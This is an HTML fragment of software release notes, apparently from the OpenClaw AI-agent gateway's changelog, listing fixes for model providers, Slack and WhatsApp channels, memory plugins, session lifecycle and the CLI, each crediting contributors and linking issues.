<li>Providers/Amazon Bedrock: expose the full Claude Opus 4.7 thinking profile (<code>xhigh</code>, <code>adaptive</code>, and <code>max</code>) for Bedrock model refs, while keeping Opus/Sonnet 4.6 on adaptive-by-default, so <code>/think</code> menus and validation match the Anthropic transport behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354600083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74701" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74701/hovercard" href="https://github.com/openclaw/openclaw/issues/74701">#74701</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sparkleHazard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sparkleHazard">@sparkleHazard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/tokenjuice: compile the bundled plugin against tokenjuice 0.7.0's published OpenClaw host types instead of a local compatibility shim, so package contract drift fails in OpenClaw validation before release. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>OAuth/secrets: ignore root-level Google OAuth <code>client_secret_*.json</code> downloads so local client-secret files do not appear as commit candidates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354413662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74689" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74689/hovercard" href="https://github.com/openclaw/openclaw/pull/74689">#74689</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeongdulee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeongdulee">@jeongdulee</a>.</li>
<li>Memory: mirror <code>sqlite-vec</code> into packaged bundled-plugin runtime deps for the default memory plugin, so builtin vector search does not lose its SQLite extension after upgrading to 2026.4.27. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354441000" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74692" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74692/hovercard" href="https://github.com/openclaw/openclaw/issues/74692">#74692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mozi1924/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mozi1924">@mozi1924</a>.</li>
<li>Gateway/startup: bound local discovery advertisement during startup, so a stuck discovery plugin can no longer keep the Gateway from reaching ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346875416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73865/hovercard" href="https://github.com/openclaw/openclaw/issues/73865">#73865</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>Gateway/models: serve the last successful model catalog while stale reloads refresh in the background, so Gateway control-plane and OpenAI-compatible requests no longer block behind model-provider rediscovery after model config changes. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348343209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74135" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74135/hovercard" href="https://github.com/openclaw/openclaw/issues/74135">#74135</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353860044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74633" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74633/hovercard" href="https://github.com/openclaw/openclaw/issues/74633">#74633</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moltar-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moltar-bot">@moltar-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Saboor711/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Saboor711">@Saboor711</a>.</li>
<li>CLI/status: resolve read-only channel setup runtime fallback from the packaged OpenClaw dist root, so <code>status --all</code>, <code>status --deep</code>, channel, and doctor paths do not crash when an external channel plugin needs setup metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354478427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74693" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74693/hovercard" href="https://github.com/openclaw/openclaw/issues/74693">#74693</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>SDK/events: keep per-run SDK event streams from surfacing duplicate raw chat projection frames, while normalizing chat-only projection frames and preserving raw access through <code>rawEvents</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354625879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74704/hovercard" href="https://github.com/openclaw/openclaw/issues/74704">#74704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>SDK: report Gateway terminal <code>agent.wait</code> timeout snapshots with lifecycle metadata as <code>timed_out</code> while keeping bare wait deadlines non-terminal. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawsweeper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawsweeper">@clawsweeper</a>.</li>
<li>Google Meet: block managed Chrome intro/test speech until browser health proves the participant is in-call, and expose <code>speechReady</code> diagnostics so login, admission, permission, and audio-bridge blockers no longer look like successful speech. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Slack/commands: keep native command argument menus on select controls for encoded choice values up to Slack's option limit and truncate fallback button labels to Slack's button-text limit, so long valid choices no longer render invalid Slack blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Agents/Codex: flush accepted debounced steering messages before normal app-server turn cleanup, so inbound follow-ups acknowledged as queued are not dropped when the turn completes before the debounce fires. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Slack/interactive replies: keep rendered buttons and selects within Slack Block Kit value and count limits, and align command argument select values with Slack's option limit, so overlong agent-authored choices no longer make Slack reject the whole block payload. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/interactive replies: drop overlong Block Kit button URLs while preserving valid callback values, so malformed link buttons no longer make Slack reject the whole interactive reply. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: truncate native command argument-menu confirmation text to Slack's dialog limit, so long plugin arg names no longer make fallback buttons render invalid Block Kit payloads. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval metadata context to Slack's element and text limits, so large approval details no longer make Slack reject the approval card. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/exec approvals: cap native approval update fallback text to Slack's message limit while preserving the rendered approval blocks, so long commands no longer make resolved or expired approval cards stay stale after <code>chat.update</code> rejects <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: cap native command argument-menu fallback rows to Slack's message block limit, so large plugin choice lists no longer make Slack reject the generated menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/commands: drop fallback command argument buttons whose encoded values exceed Slack's button-value limit, so one oversized plugin choice no longer makes Slack reject the whole menu. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: merge message-tool presentation and interactive blocks on Slack sends, so buttons and selects are no longer dropped when a structured message body is also present. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text to Slack's send limit while preserving the rendered blocks, so long context fallbacks no longer make rich Slack messages fail with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Slack/messages: cap Block Kit fallback text on message edits while preserving the rendered blocks, so long context fallbacks no longer make Slack reject <code>chat.update</code> calls with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Channels/WhatsApp: require Baileys outbound message ids before marking auto-replies delivered, so transcript text and ack reactions no longer make failed group replies look sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090958823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49225" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49225/hovercard" href="https://github.com/openclaw/openclaw/issues/49225">#49225</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>CLI/update: scope packaged Node compile caches by OpenClaw version and install metadata, so global installs no longer reuse stale compiled chunks after package updates. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Channels/Voice call: keep pre-auth webhook in-flight limiting active when socket remote address metadata is missing, so slow-body requests from stripped-IP proxy paths still share the fallback bucket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351826007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74453/hovercard" href="https://github.com/openclaw/openclaw/pull/74453">#74453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Plugin SDK/testing: lazy-load TypeScript from the plugin test-contract runtime and add release checks for critical SDK contract entrypoint imports and bundle size, so published packages fail preflight before shipping ESM-incompatible or oversized contract helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/Microsoft Teams: treat configured <code>19:...@thread.tacv2</code> and legacy <code>19:...@thread.skype</code> team/channel IDs as already resolved during startup, avoiding false <code>channels unresolved</code> warnings while preserving Graph name lookup for display-name entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354343671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74683/hovercard" href="https://github.com/openclaw/openclaw/issues/74683">#74683</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>.</li>
<li>CLI/browser: preserve parent flags while lazy-loading browser subcommands, so <code>openclaw browser --json open</code> and <code>openclaw browser --json tabs</code> keep machine-readable output after reparsing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353127836" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74574/hovercard" href="https://github.com/openclaw/openclaw/issues/74574">#74574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devintegeritsm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devintegeritsm">@devintegeritsm</a>.</li>
<li>Exec/elevated: preserve <code>turnSourceChannel</code> as <code>messageProvider</code> on approval-followup runs so <code>tools.elevated.allowFrom.&lt;provider&gt;</code> checks no longer fail with <code>provider=null</code> after the user approves an async elevated command. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354035233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74646/hovercard" href="https://github.com/openclaw/openclaw/issues/74646">#74646</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xhd2015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xhd2015">@xhd2015</a>.</li>
<li>Plugins/runtime-deps: add <code>openclaw plugins deps</code> inspection and repair with script-free package-manager defaults shared across plugin installers, so operators can repair missing bundled runtime deps without corrupting JSON output or blocking unrelated conflict-free deps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/output: strip internal <code>[tool calls omitted]</code> replay placeholders from user-facing replies while preserving visible reply whitespace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353111354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74573/hovercard" href="https://github.com/openclaw/openclaw/issues/74573">#74573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>Providers/Google Vertex: route authorized_user ADC credentials through OpenClaw's REST transport so Docker installs using gcloud application-default credentials no longer crash in the Google SDK before requests are sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353780535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74628/hovercard" href="https://github.com/openclaw/openclaw/issues/74628">#74628</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhal2001-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhal2001-design">@frankhal2001-design</a>.</li>
<li>ACP/resolver: fall through to thread-bound session resolution when an explicit <code>--session</code> token cannot be resolved while preserving the bad-token diagnostic when no thread binding exists, so Discord slash commands that auto-fill the current thread ID as the positional ACP target no longer return "Unable to resolve session target" errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259261328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66299/hovercard" href="https://github.com/openclaw/openclaw/issues/66299">#66299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/sessions: emit a terminal lifecycle backstop when embedded timeout/error turns return without <code>agent_end</code>, so Gateway sessions no longer stay stuck in <code>running</code> after failover surfaces a timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353527154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74607/hovercard" href="https://github.com/openclaw/openclaw/issues/74607">#74607</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/millerc79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/millerc79">@millerc79</a>.</li>
<li>Gateway/diagnostics: include stuck-session reason hints and recovery skip causes in warnings, so operators can tell whether a lane is waiting on active work, queued work, or stale bookkeeping. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/DeepSeek: expose native DeepSeek V4 <code>xhigh</code> and <code>max</code> thinking levels through the provider <code>resolveThinkingProfile</code> hook so <code>/think xhigh|max</code> applies the intended effort instead of falling back to base levels. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338479166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73008/hovercard" href="https://github.com/openclaw/openclaw/pull/73008">#73008</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Agents/Codex: bound embedded-run cleanup, trajectory flushing, and command-lane task timeouts after runtime failures, so Discord and other chat sessions return to idle instead of staying stuck in processing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/exec: consume successful metadata-only async exec completions silently so Telegram and other chat surfaces no longer ask users for missing command logs after <code>No session found</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353366864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74595/hovercard" href="https://github.com/openclaw/openclaw/issues/74595">#74595</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gkoch02/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gkoch02">@gkoch02</a>.</li>
<li>Web fetch: add a documented <code>tools.web.fetch.ssrfPolicy.allowIpv6UniqueLocalRange</code> opt-in and thread it through cache keys and DNS/IP checks so trusted fake-IP proxy stacks using <code>fc00::/7</code> can work without broad private-network access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350890451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74351/hovercard" href="https://github.com/openclaw/openclaw/issues/74351">#74351</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>OpenAI Codex: restore <code>/verbose full</code> persistence and app-server tool-output forwarding, and retry Gateway E2E temp-home cleanup so debug runs do not regress on stale validation or cleanup flakes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Anthropic/Meridian: preserve text and thinking content seeded on <code>content_block_start</code> in anthropic-messages streams, so <code>[thinking, text]</code> replies no longer persist as empty turns or trigger empty-response fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351435288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74410/hovercard" href="https://github.com/openclaw/openclaw/issues/74410">#74410</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Channels/Matrix: complete the cross-signing handshake on <code>openclaw matrix verify confirm-sas</code> so the operator's other Matrix device clears its <code>Verifying…</code> loop instead of staying stuck after the agent confirms. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352761902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74542/hovercard" href="https://github.com/openclaw/openclaw/pull/74542">#74542</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>.</li>
<li>CLI/status: honor channel-specific model context-window overrides when reporting effective context, so channel-scoped sessions reflect the active window in <code>openclaw status</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sandbox/Docker: tolerate Docker daemon unavailability when sandbox mode is off, so doctor and preflight checks no longer fail on installs that do not run the Docker daemon. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344707479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73671/hovercard" href="https://github.com/openclaw/openclaw/pull/73671">#73671</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaseonedge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaseonedge">@kaseonedge</a>.</li>
<li>Control UI/mobile: persist mobile chat settings through Lit-managed state and route mobile navigation through the same view-state path so chat panel toggles survive transitions on small viewports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/exports: align sidebar trigger affordances across the resizable divider, mobile layout, and exported-HTML transcript template so the sidebar toggle and exported transcript sidebar render with consistent hit areas and styling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: disable the page refresh affordance while a chat run is active so accidental refreshes do not abort an in-flight reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Angfr95/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Angfr95">@Angfr95</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Memory/LanceDB: return real memory records from <code>openclaw ltm list</code> (with optional <code>--limit</code> and createdAt ordering) instead of an empty placeholder, so the CLI surface matches the documented LTM listing contract. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279969994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67952/hovercard" href="https://github.com/openclaw/openclaw/pull/67952">#67952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyue19921010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyue19921010">@zhangyue19921010</a>.</li>
<li>Media: include redacted per-attempt resize failures and resolved model input capabilities in vision-pipeline errors so ARM64 image failures are diagnosable without closing the remaining routing investigation. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352922423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74552/hovercard" href="https://github.com/openclaw/openclaw/issues/74552">#74552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
